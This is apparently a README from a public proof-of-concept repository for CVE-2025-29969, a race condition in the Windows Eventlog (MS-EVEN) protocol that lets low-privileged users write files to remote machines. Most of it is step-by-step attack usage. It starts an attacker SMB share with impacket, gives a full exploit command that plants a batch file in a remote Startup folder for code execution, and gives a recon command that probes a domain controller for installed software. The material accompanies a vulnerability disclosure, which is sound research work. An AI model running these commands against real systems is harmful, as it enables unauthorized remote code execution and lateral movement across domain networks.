### EventLogin - CVE-2025-29969
EventLogin is a Time-of-check time-of-use vulnerability in the MS-EVEN protocol. The vulnerability enables low-privileged users to write arbitrary files to a remote machine, effectively bypassing the need for an Administrator account for a remote write.

There are two scripts in this repository, one weaponizes the vulnerability (write_file_remotely.py), and the other one uses one of the vulnerability primitives in order to check if a remote file exists or not, as a low-privileged user, which is useful, for example, to see installed programs on other computers in the domain.

You can read the full analysis here:

[EventLog-in: Propagating With Weak Credentials Using the Eventlog Service in Microsoft Windows](https://www.safebreach.com/blog/safebreach_labs_discovers_cve-2025-29969/)

### Usage for write_file_remotely
First, create an SMB share using impacket:

```
impacket-smbserver -smb2support Share /tmp/safebreach
```
Note, the script is using the hard-coded 'Share' as the share name, modify if needed.

Then, run the write_file_remotely.py script and include all the required params:
1. ip_to_attack - The IP of the remote machine.
2. smb_server_ip - The IP of the machine you opened the share on, can be the attacker machine.
3. username and password - The credentials to the low-privileged account.
4. valid_evtx_file_path - A path to a valid EVTX file that you store in the same share you opened before.
5. local_file_path - The file you want to upload.
6. remote_file_path - The remote file path you want to upload to.

Example:

```
python write_file_remotely.py 192.168.56.102 192.168.56.105 lowuser Test123 "/tmp/safebreach/Sample.evtx" "calc.bat" "C:\\Users\\lowuser\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\target.bat"
```

### Usage for check_if_exists

This script does not utilize the vulnerability itself, it uses only the "CreateFile" primitive and can help you recon the network. 

For example, the Program Files directory of a remote machine in a domain is accessible to the whole 'Users' group, which means that by using credentials of ANY user you can check if a file exists or not in another machine.

It accepts the following parameters:
1. ip_to_attack - IP to recon
2. username - username and password of domain user.
3. filepath_to_check - a file to check

For example, see if wireshark is installed on the DC (192.168.56.57) using a low privileged user.
```
python check_if_exists.py 192.168.56.57 lowuser Password1! "C:\Program Files\Wireshark"

Result:
FILE_EXISTS_AND_IS_DIRECTORY

```



